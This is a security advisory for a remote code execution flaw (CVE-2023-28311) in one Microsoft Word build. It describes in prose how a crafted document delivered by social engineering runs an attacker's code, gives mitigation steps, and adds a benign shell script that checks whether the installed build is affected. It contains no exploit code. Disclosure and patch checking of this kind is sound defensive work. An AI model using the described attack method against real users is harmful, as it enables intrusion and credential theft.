Vendor: Microsoft
Product Name: Word
Author: nu11secur1ty
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote Code Execution (RCE)
CWE: 284 (Improper Access Control)
Affected Version From: 16.72.23040900
Affected Version To: 16.72.23040900
Patch Exists: YES
Related CVE: CVE-2023-28311
CPE: a:microsoft:word:16.72.23040900
Platforms Tested:
Date: 2023
Microsoft Word 16.72.23040900 – Remote Code Execution (RCE)
The attack vector is local: the vulnerability is triggered on the targeted system by a user who is already authenticated to it, so the attacker needs user interaction. An attacker exploits it by convincing the victim, through social engineering, to download a specially crafted Word document from a website (or a link or attachment pointing to one) and open it. Opening the document runs the attacker's code locally with the privileges of that user. What follows depends on the payload and the scenario: the attacker can, for example, steal credentials and banking information, or sniff and track all of the victim's traffic persistently.
Mitigation:
Apply the Microsoft security update that addresses CVE-2023-28311; a patch exists for the affected build listed above, and installing it is the actual fix. Check that the installed Word build is no longer inside the affected range after updating. Until the update is deployed, ensure that all users are aware of the risks of downloading and opening files from untrusted sources, and train them to recognize and avoid social engineering attacks, since user interaction is required for exploitation.
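As an added example, not part of the original advisory, the following POSIX shell script checks whether an installed Word build lies inside the affected range stated above (Affected Version From/To, taken verbatim from this page). It assumes the build string has the Office for Mac form, that the application bundle is at /Applications/Microsoft Word.app, and that the full build string is stored in the CFBundleVersion key of its Info.plist; these paths and keys are assumptions to adjust for your installation.

```shell
#!/bin/sh
# Added example, not the advisory's own tooling.
# Compare an installed Word build against the affected range from the advisory.

AFFECTED_FROM="16.72.23040900"   # Affected Version From (advisory field)
AFFECTED_TO="16.72.23040900"     # Affected Version To   (advisory field)

# Assumed location of the build string (adjust if your install differs).
WORD_PLIST="/Applications/Microsoft Word.app/Contents/Info"

# vercmp A B: compare dotted numeric versions component by component.
# Prints -1 if A < B, 0 if equal, 1 if A > B. Missing components count as 0,
# so "16.72" and "16.72.0" compare equal.
vercmp() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai="${a%%.*}"; bi="${b%%.*}"
        [ -z "$ai" ] && ai=0
        [ -z "$bi" ] && bi=0
        if [ "$ai" -lt "$bi" ]; then printf '%s\n' -1; return; fi
        if [ "$ai" -gt "$bi" ]; then printf '%s\n' 1; return; fi
        # Drop the leading component; stop when no dot remains.
        case "$a" in *.*) a="${a#*.}";; *) a="";; esac
        case "$b" in *.*) b="${b#*.}";; *) b="";; esac
    done
    printf '%s\n' 0
}

# is_affected VERSION: true (exit 0) when FROM <= VERSION <= TO inclusive.
is_affected() {
    v="$1"
    [ "$(vercmp "$v" "$AFFECTED_FROM")" -ge 0 ] &&
    [ "$(vercmp "$v" "$AFFECTED_TO")" -le 0 ]
}

# installed_word_version: print the build string recorded in the Word bundle.
# Assumes CFBundleVersion holds the full "16.72.23040900"-style string.
installed_word_version() {
    [ -f "$WORD_PLIST.plist" ] || return 1
    defaults read "$WORD_PLIST" CFBundleVersion 2>/dev/null
}

main() {
    v="$(installed_word_version)" || {
        echo "Word not found at $WORD_PLIST.plist; adjust WORD_PLIST" >&2
        return 2
    }
    if is_affected "$v"; then
        echo "Word $v is inside the affected range; apply the Microsoft update"
        return 1
    fi
    echo "Word $v is outside the affected range"
    return 0
}

# Run the live check only when invoked with --check, e.g.:
#   sh check_word.sh --check
if [ "${1-}" = "--check" ]; then
    main
    exit "$?"
fi
```

The comparison is done numerically per component rather than with a string compare, so builds such as 16.72.9 and 16.72.23040900 order correctly; the script exits 1 when the installed build is affected, which makes it usable from fleet-management tooling.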